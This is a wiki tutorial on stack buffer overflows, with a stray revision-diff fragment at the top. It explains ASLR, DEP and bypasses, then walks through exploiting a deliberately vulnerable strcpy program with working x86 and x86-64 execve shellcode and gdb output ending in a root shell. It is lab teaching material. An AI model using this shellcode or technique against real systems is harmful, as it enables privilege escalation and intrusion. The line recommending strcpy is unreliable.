  0x7fffffffe5c0: 0x00000000 0x00000000 0x00000019 0x00000000
 +
  0x7fffffffe5d0: 0xffffe609 0x00007fff 0x0000001f 0x00000000
 +
  0x7fffffffe5e0: 0xffffefe1 0x00007fff 0x0000000f 0x00000000
 +
  0x7fffffffe5f0: 0xffffe619 0x00007fff 0x00000000 0x00000000
 +
  0x7fffffffe600: 0x00000000 0x00000000 0xcc45c200 0xf80e704b
 +
  0x7fffffffe610: 0xd5660936 0xff5959b5 0x36387878 0x0034365f
 +
  0x7fffffffe620: 0x00000000 0x00000000 0x6d6f682f 0x6f782f65
 +
  0x7fffffffe630: 0x6c69662f 0x622f7a65 0x622f666f 0x9000666f
 +
  '''0x7fffffffe640: 0x90909090 0x90909090 0x90909090 0x90909090'''
 +
  '''0x7fffffffe650: 0x90909090 0x90909090 0x90909090 0x90909090'''
 +
  '''0x7fffffffe660: 0x90909090 0x90909090 0x90909090 0x90909090'''
 +
  '''0x7fffffffe670: 0x90909090 0x90909090 0x48909090 0xbb48d231'''
 +
  ...
 +
 
 +
Note the nopsled begins at 0x7fffffffe640, thus placed into rsp. Converted to little endian and formatted appropriately, this is \x40\xe6\xff\xff\xff\x7f\x00\x00.
 +
 
 +
===Exploitation===
 +
Following the clearance of the breakpoint, restart the application with the same command line argument, but replace the "\x41\x41\x41x\x41" at the end of the argument with the return address of "\x10\xf6\xff\xbf"
  
 
   (gdb) clear main
 
   (gdb) clear main
 
   Deleted breakpoint 1  
 
   Deleted breakpoint 1  
  
   (gdb) r `ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x10\xf6\xff\xbf"'`
+
=====On x86=====
 +
 
 +
   (gdb) r `ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46
 +
  \x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89
 +
  \xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x10\xf6\xff\xbf"'`
 
   The program being debugged has been started already.
 
   The program being debugged has been started already.
 
   Start it from the beginning? (y or n) y
 
   Start it from the beginning? (y or n) y
  
   Starting program: /home/teknical/bof `ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x10\xf6\xff\xbf"'`
+
   Starting program: /home/teknical/bof `ruby -e 'print "\x90"*60,"\xeb\x1f\x5e
   process 2262 is executing new program: /bin/dash
+
  \x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d
 +
  \x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh",  
 +
  "A"*7, "\x10\xf6\xff\xbf"'`
 +
   process 2262 is executing new program: /bin/sh
 
   # whoami
 
   # whoami
 
   root
 
   root
   #  
+
   #
  
 +
=====On x86-64=====
  
YAY!.  We have successful exploitation.  If for some reason your exploitation was not successful, you could attempt a different return address.  Later we will move into more advanced topics.  I hope this was helpful.
+
  (gdb) r `perl -e 'print "\x90" x 60, "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e
 +
  \x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f
 +
  \x05", "A" x 30, "\x40\xe6\xff\xff\xff\x7f\x00\x00"'`
 +
  Starting program: /home/xo/filez/bof/bof `perl -e 'print "\x90" x 60, "\x48\x31
 +
  \xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50
 +
  \x57\x48\x89\xe6\xb0\x3b\x0f\x05", "A" x 30, "\x40\xe6\xff\xff\xff\x7f\x00\x00"'`
 +
  process 27319 is executing new program: /bin/dash
 +
  $ whoami
 +
  xo
 +
  $
  
 +
{{Quote|The x86-64 shellcode used in this example does not call setuid() so it will execute at the privileges of the exploited application|Xochipilli}}
  
 +
YAY! Successful exploitation has occured. 
 +
{{protip|If for some reason the exploitation was not successful, you could attempt a different [[return address]].}}
  
[[Category:Attacks]]
+
{{exploitation}}

Latest revision as of 08:37, 20 June 2016

Buffer overflow, or Buffer Overrun is a software error triggered when a program does not adequately control the amount of data that is copied over the buffer, if this amount exceeds the preassigned capacity, remaining bytes are stored in adjacent memory areas by overwriting its original content. This can be exploited by overwriting a fuction's return address to cause arbitrary code execution and allow access to a vulnerable system.

c3el4.png This is an introductory article to buffer overflows. Bleeding Life is an example of a project containing buffer overflows that bypass ASLR and DEP for Windows 7.
Buffer overflow requires a basic understanding of assembly and machine code.


Special thanks to Teknical for his contributions to this article.

Description

A computer receives input, recalls what to do with the input, and then does it. If an attacker on the internet could control the memory of a computer, the computer would remember the wrong thing to do, and execute it because it doesn't know any better. This is what happens during a buffer overflow attack.

The memory of a computer is much like a post office. Each piece of mail goes to a mailbox or a P.O. box, and each P.O. box can only hold one piece of mail at a time. Suppose for a moment that the post office that represents the computer's memory has 500 P.O. boxes. Boxes 1-200 are for data that the user sends into the computer, and boxes 201-500 hold instructions for what to do with that data. If a user sends in 300 pieces of data or mail, there are two scenarios: 1. A secure program would tell the user "I can only hold 200 pieces, I'm not taking any more mail". 2. An insecure program would simply take all the data into boxes 1-300.

In the insecure scenario, when the computer remembers what to do, it lands on P.O. box 201. If the user was an attacker, malicious instructions at P.O. box 201 would be executed! This is why the buffer overflow is such a dangerous vulnerability.
Notice: Though it is a dying attack vector, the buffer overflow is still very prominent today.

In all actuality, there is a return address that the computer uses to remember where its instructions are. So if an attacker filled up P.O. boxes 1-201, and 201 contained the return address, and the attacker changed the return address to P.O. box 1, the computer would execute the data instead of just keeping it in memory. This means that the attacker has to know enough about the system to know what address the malicious instructions are going to, because otherwise the attacker will not know the correct return address to put into P.O. Box 201. This means that the attacker has to have precise aim, or the attack will be unsuccessful.

Protip: Debuggers such as IDA Pro, kgdb, gdb, and ollydbg are very helpful for finding the correct return pointer for the shellcode.


Defenses

ASLR

There are multiple defenses that have been incorporated into runtime in an attempt to fight buffer overflows and prevent them from taking place. One of the most recent defense mechanisms is called ASLR, which stands for Address Space Layout Randomization. It makes it so every time the computer reboots and every time a program runs, the address space that it lives in changes. In other words, following the mailbox analogy, the return address will never be in the same mailbox. The point of this is to try to prevent an attacker from performing a buffer overflow exploit because the attacker can never aim properly. Unfortunately, attackers have discovered something called "Magic Numbers", which tricks the error handler for programs and allows an attacker to aim his attack correctly without having to know a return address. Some key failures of ASLR include that certain Operating Systems (such as Windows 7) dynamically disable it for non-compatible libraries.

DEP

Another defense mechanism that has been implemented is called DEP, which stands for Data Execution Prevention. This is an attempt to prevent the return address from being changed into something in the same memory space as the data, and also prevent machine code (the code that buffer overflows are crafted in) from being placed into data segments. Return_Oriented_Programming_(ROP) is used when defeating modern DEP.

To combat additional filters, attackers have developed polymorphic and multi-architecture alphanumeric shellcode and polymorphic ASCII machine code and shellcodes. ASCII and Polymorphic ASCII code looks to many filters like normal user input instead of malicious binary or machine code.

Containers

An even further defense mechanism is called a container, which is another layer of Data Execution Prevention. The container attempts to identify all possible results of code from data within the buffer (or the data segment) and then prevent the application from calling external functions in shared objects from the inside of the buffer. A version of this has been implemented in Cisco Security Agent, or CSA. Linux's GrSec and PaX kernel patches also implement their own version of contained memory space.
Notice: As attacks become more and more sophisticated, so do hardware and software prevention mechanisms. Notice something outdated? Visit our IRC and tell us about it!

Bypassing protections

So with CSA, ASLR, and Operating-System supplied DEP, successfully performing a buffer overflow exploit against a system can be extremely difficult. Any attacker who makes it to the point where CSA catches it is already very advanced. To successfully subvert ASLR, DEP and containers one must use polymorphic ASCII shellcode and return-oriented programming. Return-oriented programming is used to evade the NX bit and XD bits, a type of hardware DEP implemented directly into processors. Machine code that self-modifies as well as looks like standard user input and has all of its own functions built into its own code, in a return-oriented fashion, is required to bypass modern-day host level buffer overflow defense standards. The return address must always be specified in normal hexadecimal format, so it will usually look like some really funny characters, like squares or like strange symbols. The IDS or HIDS Context Buffer will show four squares or symbols on the end in a real buffer overflow exploit attempt on 32-bit systems, and eight squares or symbols on the end on a 64-bit system.

c3el4.png Learning to count in hex and bitwise math will tell you more about the sizes.

Maximum effectiveness

Many times firewall rules will prevent any connections outgoing from a server machine and prevent all incoming connections except for connections on the specified server port. Because of this, attackers use what is called Second Stage Shellcode to first find the connection that the exploit originated from, and then send the output of the arbitrary functions back along the first connection. This is done to circumvent firewalls and prevent a firewall from blocking a connection.

Buffer overflows can be used remotely to gain partial or total systems access, or they can be used locally to escalate privileges and permissions segments inside of the operating system in order to gain system or root level access. The real threat that a buffer overflow causes is what is called the "Zero-Day attack", also known as a buffer overflow that the security world has never seen before. Zero-Day or 0day attacks are the most devastating to the security industry, causing worms, viruses, and sometimes even hundreds of thousands of systems to be compromised in a single day.

Causes

Buffer overflows exist because a combination of insecure language compilers, insecure programmers and bad cpu architectures that keep return address from a function call in the stack. A programmer should be able to check input to the data segment with relative ease, however often times coders are either ignorant of the problem, overlook the flaw, or sometimes even a disgruntled employee might code the vulnerability into an application himself for his own personal gain after the application goes to production.

Protip: Bench-marking and pen-testing software in an as-you-develop fashion for proper quality assurance and control can help prevent attacks from a malicious insider.


Example

Notice: This example is for a 32 bit Linux operating system and the steps below may vary per your distribution and installation.

Disabling ASLR

The first step is to disable ASLR. This allows the featured proof of concept to be successful. There are other methods of bypassing ASLR, but will not be covered here.

 teknical@teknical-vm:~$ sudo -s
 [sudo] password for teknical: 
 root@teknical-vm:~# echo 0 > /proc/sys/kernel/randomize_va_space
 root@teknical-vm:~# exit
 exit
 teknical@teknical-vm:~$ 

Test application

The test application is below. Note that there is a statically allocated buffer of 100 bytes. This is what will be overflowed. The use of strcpy on an unchecked buffer is a common procedure. Its use is recommended to prevent applications from being exploited.

bof.c

 
  #include <stdlib.h>
  #include <stdio.h>
  #include <string.h>
 
  int main(int argc, char *argv[]){
  	char buffer[100];
  	strcpy(buffer,  argv[1]);
  	return 0;
  }

Compiling

For compilation, use the -g option of gcc to include debugging symbols in the linker, resulting in easier code execution.

 teknical@teknical-vm:~$ gcc -g bof.c -o bof

Following compilation, the vulnerability can then be triggered. This example has a buffer of 100 bytes, thus a good test is 104 bytes, which will result in an overflow. Ruby is used to dynamically build a 104 byte string with perl another option.

Potential compile-time protections
 teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*104'`
 *** stack smashing detected ***: ./bof terminated
Teknical says
By default on newer versions of gcc and other modern compilers, code is sanitized and protected at compile time.
Solution for test application

The test application must be compiled without this sanitation. Removing the stack protection from program is done by the utilization of -fno-stack-protector option with gcc.

 teknical@teknical-vm:~$ gcc -g -fno-stack-protector bof.c -o bof

Testing

Setuid binary is used for this example to ensure the retrieval of a root shell. Set up the bof binary for setuid below:

 teknical@teknical-vm:~$ sudo chown root:root ./bof
 teknical@teknical-vm:~$ sudo chmod 4755 ./bof

On x86

Following the compilation of the application, the vulnerability can be triggered once again. As stated earlier, 104 bytes are used and this is increased until the vulnerability is triggered.

 teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*104'`
 teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*108'`
 teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*112'`
 Segmentation fault

Note that it took 112 bytes to successfully overwrite the saved ebp of the running application. The system is now prepared for attempts of exploitation. Note, that 116 bytes are required to overwrite the return address on the stack.

Notice: These extra bytes are other registers and sometimes special registers. These are also overwritten.

On x86-64

This number will vary on x86-64...

 xo@kingmaker:~$ ./bof `perl -e 'print "\x90" x 100'`
 xo@kingmaker:~$ ./bof `perl -e 'print "\x90" x 110'`
 xo@kingmaker:~$ ./bof `perl -e 'print "\x90" x 120'`
 Segmentation fault
 xo@kingmaker:~$ ./bof `perl -e 'print "\x90" x 119'`

On x86-64 it takes 120 bytes to trigger a segfault. Another important difference is that the return address will be placed in the 8 byte rip register, not the 4 byte eip register.

Disabling DEP

DEP is another protection scheme which prevents code in the stack from being executed. 'execstack' is used to check the status of and set the binary to have an executable stack.

Xochipilli says
Gcc's `-z execstack' parameter can be used to set the stack as executable at compile time

The -q option will query the current status.

 teknical@teknical-vm:~$ sudo execstack -q bof
 - bof

Notice the -, which means that the application will NOT have an executable stack. This will prevent successful exploitation.

The -s option is used to set the binary to allow execution on the stack.

 teknical@teknical-vm:~$ sudo execstack -s bof

If queried again, an X will appear in its place, which means that the stack is now executable.

 teknical@teknical-vm:~$ sudo execstack -q bof
 X bof

Debugging

Notice: gdb is required for the following sections, installed using the package manager

The next step is to start up gdb and begin debugging.

Shellcode analysis

c3el4.png Shellcode is machine code for a flat binary execution during exploitation of a buffer overflow exploit.
On x86

The following will be used as the argument to the test application:

 `ruby -e 'print "\x90"*60,
 "\xeb\x1f\x5e\x89\x76\x08
 \x31\xc0\x88\x46\x07\x89
 \x46\x0c\xb0\x0b\x89\xf3
 \x8d\x4e\x08\x8d\x56\x0c
 \xcd\x80\x31\xdb\x89\xd8
 \x40\xcd\x80\xe8\xdc\xff
 \xff\xff/bin/sh", "A"*7,
 "\x41\x41\x41\x41"'` 
There are a few things to be noted examining the shellcode above.
Notice: The backticks are bash command substitution as described in the bash book.
The shell code used is 45 bytes long. It is a setuid() + /bin/sh shellcode:
 \xeb\x1f\x5e\x89\x76\x08
 \x31\xc0\x88\x46\x07\x89
 \x46\x0c\xb0\x0b\x89\xf3
 \x8d\x4e\x08\x8d\x56\x0c
 \xcd\x80\x31\xdb\x89\xd8
 \x40\xcd\x80\xe8\xdc\xff
 \xff\xff/bin/sh

Following previous knowledge that at least 112 bytes are required to overwrite ebp, and another 4 to overwrite the return address. The shellcode is padded with 60 NOPs. 60 + 45 = 105. It is also known that 7 bytes are required to overwrite ebp and another 4 to overwrite the return address. 0x41/'A' is recommended for this portion because it easier to debug with. Another 7 bytes of 'A', are added and then 4 on the end for the return address. 60 + 45 + 7 + 4 = 116, which is the number of bytes needed to overwrite the return address and successfully exploit the target.

On x86-64

The following shellcode is used to spawn a shell:

 "\x48\x31\xd2"                                  // xor    %rdx, %rdx
 "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68"      // mov    $0x68732f6e69622f2f, %rbx
 "\x48\xc1\xeb\x08"                              // shr    $0x8, %rbx
 "\x53"                                          // push   %rbx
 "\x48\x89\xe7"                                  // mov    %rsp, %rdi
 "\x50"                                          // push   %rax
 "\x57"                                          // push   %rdi
 "\x48\x89\xe6"                                  // mov    %rsp, %rsi
 "\xb0\x3b"                                      // mov    $0x3b, %al
 "\x0f\x05";                                     // syscall

Or:

 \x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05

This shellcode is 30 bytes long. 120 bytes + 8 bytes are required for the return address. To start, use a 60 byte nopsled + 30 byte shellcode + 30 bytes of padding + 8 byte return address, totaling 128 bytes.

Finding the return address

  • Starting gdb
 teknical@teknical-vm:~$ gdb -q ./bof
 Reading symbols from /home/teknical/bof...done.
  • Setting a breakpoint inside of the "main" function
 (gdb) break main
 Breakpoint 1 at 0x80483ed: file bof.c, line 7.
  • Starting the application with the command line as discussed above.
On x86
 (gdb) r `ruby -e 'print "\x90"*60, "[insert our shellcode here]", "A"*7, "\x41\x41\x41\x41"'`
 Starting program: /home/teknical/bof `ruby -e 'print "\x90"*60, 
 "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56
 \x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x41\x41\x41\x41"'`
 Breakpoint 1, main (argc=2, argv=0xbffff474) at bof.c:7
 7		strcpy(buffer,  argv[1]);
Teknical says
Viewing the main function, lets examine the stack. It is known that at least 116 bytes on the stack are required, 200 bytes are used to make sure all the required space is present. Another thing to look for is the address of the shell code on the stack.
 (gdb) x/200x $esp
 0xbffff340:	0x00119222	0xbffff3e4	0x080481f4	0xbffff3d8
 0xbffff350:	0x0012ca54	0x00000000	0x0012fb48	0x00000001
 0xbffff360:	0x00000000	0x00000001	0x0012c8f8	0x00293ff4
 0xbffff370:	0x00242d19	0x0016d2a5	0xbffff388	0x001549d5
 0xbffff380:	0x00293ff4	0x08049ff4	0xbffff398	0x080482e8
 0xbffff390:	0x0011e030	0x08049ff4	0xbffff3c8	0x08048439
 0xbffff3a0:	0x00294324	0x00293ff4	0x08048420	0xbffff3c8
 0xbffff3b0:	0x0016d4a5	0x0011e030	0x0804842b	0x00293ff4
 0xbffff3c0:	0x08048420	0x00000000	0xbffff448	0x00154bd6
 0xbffff3d0:	0x00000002	0xbffff474	0xbffff480	0x0012f858
 0xbffff3e0:	0xbffff430	0xffffffff	0x0012bff4	0x08048245
 0xbffff3f0:	0x00000001	0xbffff430	0x0011d626	0x0012cab0
 0xbffff400:	0x0012fb48	0x00293ff4	0x00000000	0x00000000
 0xbffff410:	0xbffff448	0xee66f487	0x3b1663f8	0x00000000
 0xbffff420:	0x00000000	0x00000000	0x00000002	0x08048330
 0xbffff430:	0x00000000	0x00123230	0x00154afb	0x0012bff4
 0xbffff440:	0x00000002	0x08048330	0x00000000	0x08048351
 0xbffff450:	0x080483e4	0x00000002	0xbffff474	0x08048420
 0xbffff460:	0x08048410	0x0011e030	0xbffff46c	0x0012c8f8
 0xbffff470:	0x00000002	0xbffff5e4	0xbffff5f7	0x00000000
 0xbffff480:	0xbffff66c	0xbffff690	0xbffff6a3	0xbffff6b3
 0xbffff490:	0xbffff6be	0xbffff70f	0xbffff721	0xbffff74b
 0xbffff4a0:	0xbffff76b	0xbffff779	0xbffffc1a	0xbffffc40
 0xbffff4b0:	0xbffffc52	0xbffffcae	0xbffffce0	0xbffffceb
 0xbffff4c0:	0xbffffd17	0xbffffd64	0xbffffd7a	0xbffffd89
 0xbffff4d0:	0xbffffd9c	0xbffffdb3	0xbffffdca	0xbffffdda
 0xbffff4e0:	0xbffffdee	0xbffffe23	0xbffffe2c	0xbffffe3d
 0xbffff4f0:	0xbffffe4f	0xbffffe63	0xbffffe6b	0xbffffe97
 0xbffff500:	0xbffffea8	0xbfffff0a	0xbfffff47	0xbfffff67
 0xbffff510:	0xbfffff74	0xbfffff96	0xbfffffaf	0x00000000
 0xbffff520:	0x00000020	0x0012d420	0x00000021	0x0012d000
 0xbffff530:	0x00000010	0x078bf3ff	0x00000006	0x00001000
 0xbffff540:	0x00000011	0x00000064	0x00000003	0x08048034
 0xbffff550:	0x00000004	0x00000020	0x00000005	0x00000008
 0xbffff560:	0x00000007	0x00110000	0x00000008	0x00000000
 0xbffff570:	0x00000009	0x08048330	0x0000000b	0x000003e8
 0xbffff580:	0x0000000c	0x000003e8	0x0000000d	0x000003e8
 0xbffff590:	0x0000000e	0x000003e8	0x00000017	0x00000001
 0xbffff5a0:	0x00000019	0xbffff5cb	0x0000001f	0xbfffffe9
 0xbffff5b0:	0x0000000f	0xbffff5db	0x00000000	0x00000000
 0xbffff5c0:	0x00000000	0x00000000	0x85000000	0xaaec0f53
 0xbffff5d0:	0xb8fc08c0	0xd3d76e6a	0x693bf638	0x00363836
 0xbffff5e0:	0x00000000	0x6d6f682f	0x65742f65	0x63696e6b
 0xbffff5f0:	0x622f6c61	0x9000666f	0x90909090	0x90909090
 0xbffff600:	0x90909090	0x90909090	0x90909090	0x90909090
 0xbffff610:	0x90909090	0x90909090	0x90909090	0x90909090
 0xbffff620:	0x90909090	0x90909090	0x90909090	0x90909090
 0xbffff630:	0xeb909090	0x76895e1f	0x88c03108	0x46890746
 0xbffff640:	0x890bb00c	0x084e8df3	0xcd0c568d	0x89db3180
 0xbffff650:	0x80cd40d8	0xffffdce8	0x69622fff	0x68732f6e

The next step is to find the shellcode on the stack. The easiest thing to do here is to look for the NOPs. The address of the NOPs is required so this can be used as the return address on the stack. This will cause execution to resume with the shell code once the function returns.

Protip: Advanced attacks include ascii shellcode for maximum evasion.


Note the NOPS above starting at 0xbffff5f8. 0xbffff610 will be used since it is a cleaner address. This can be arranged in little endian format: "\x10\xf6\xff\xbf"

On x86-64
 (gdb) r `perl -e 'print "\x90" x 60, "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68
 \x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05", "A" x 30, "\x41\x41
 \x41\x41\x41\x41\x41\x41"'`
 Starting program: /home/xo/filez/bof/bof `perl -e 'print "\x90" x 60, "\x48\x31\xd2\x48\xbb
 \x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b
 \x0f\x05", "A" x 30, "\x41\x41\x41\x41\x41\x41\x41\x41"'`
 (gdb) x/400x $rsp
Xochipilli says
I truncated this cause it was huge
 ...
 0x7fffffffe510:	0x00000064	0x00000000	0x00000003	0x00000000
 0x7fffffffe520:	0x00400040	0x00000000	0x00000004	0x00000000
 0x7fffffffe530:	0x00000038	0x00000000	0x00000005	0x00000000
 0x7fffffffe540:	0x00000008	0x00000000	0x00000007	0x00000000
 0x7fffffffe550:	0xf7ddd000	0x00007fff	0x00000008	0x00000000
 0x7fffffffe560:	0x00000000	0x00000000	0x00000009	0x00000000
 0x7fffffffe570:	0x00400400	0x00000000	0x0000000b	0x00000000
 0x7fffffffe580:	0x000003e8	0x00000000	0x0000000c	0x00000000
 0x7fffffffe590:	0x000003e8	0x00000000	0x0000000d	0x00000000
 0x7fffffffe5a0:	0x000003e8	0x00000000	0x0000000e	0x00000000
 0x7fffffffe5b0:	0x000003e8	0x00000000	0x00000017	0x00000000
 0x7fffffffe5c0:	0x00000000	0x00000000	0x00000019	0x00000000
 0x7fffffffe5d0:	0xffffe609	0x00007fff	0x0000001f	0x00000000
 0x7fffffffe5e0:	0xffffefe1	0x00007fff	0x0000000f	0x00000000
 0x7fffffffe5f0:	0xffffe619	0x00007fff	0x00000000	0x00000000
 0x7fffffffe600:	0x00000000	0x00000000	0xcc45c200	0xf80e704b
 0x7fffffffe610:	0xd5660936	0xff5959b5	0x36387878	0x0034365f
 0x7fffffffe620:	0x00000000	0x00000000	0x6d6f682f	0x6f782f65
 0x7fffffffe630:	0x6c69662f	0x622f7a65	0x622f666f	0x9000666f
 0x7fffffffe640:	0x90909090	0x90909090	0x90909090	0x90909090
 0x7fffffffe650:	0x90909090	0x90909090	0x90909090	0x90909090
 0x7fffffffe660:	0x90909090	0x90909090	0x90909090	0x90909090
 0x7fffffffe670:	0x90909090	0x90909090	0x48909090	0xbb48d231
 ...

Note the nopsled begins at 0x7fffffffe640, thus placed into rsp. Converted to little endian and formatted appropriately, this is \x40\xe6\xff\xff\xff\x7f\x00\x00.

Exploitation

Following the clearance of the breakpoint, restart the application with the same command line argument, but replace the "\x41\x41\x41x\x41" at the end of the argument with the return address of "\x10\xf6\xff\xbf"

 (gdb) clear main
 Deleted breakpoint 1 
On x86
 (gdb) r `ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46
 \x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89
 \xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x10\xf6\xff\xbf"'`
 The program being debugged has been started already.
 Start it from the beginning? (y or n) y
 Starting program: /home/teknical/bof `ruby -e 'print "\x90"*60,"\xeb\x1f\x5e
 \x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d
 \x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", 
 "A"*7, "\x10\xf6\xff\xbf"'`
 process 2262 is executing new program: /bin/sh
 # whoami
 root
 #
On x86-64
 (gdb) r `perl -e 'print "\x90" x 60, "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e
 \x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f
 \x05", "A" x 30, "\x40\xe6\xff\xff\xff\x7f\x00\x00"'`
 Starting program: /home/xo/filez/bof/bof `perl -e 'print "\x90" x 60, "\x48\x31
 \xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50
 \x57\x48\x89\xe6\xb0\x3b\x0f\x05", "A" x 30, "\x40\xe6\xff\xff\xff\x7f\x00\x00"'`
 process 27319 is executing new program: /bin/dash
 $ whoami
 xo
 $
Xochipilli says
The x86-64 shellcode used in this example does not call setuid() so it will execute at the privileges of the exploited application

YAY! Successful exploitation has occured.

Protip: If for some reason the exploitation was not successful, you could attempt a different return address.


Buffer overflow is part of a series on exploitation.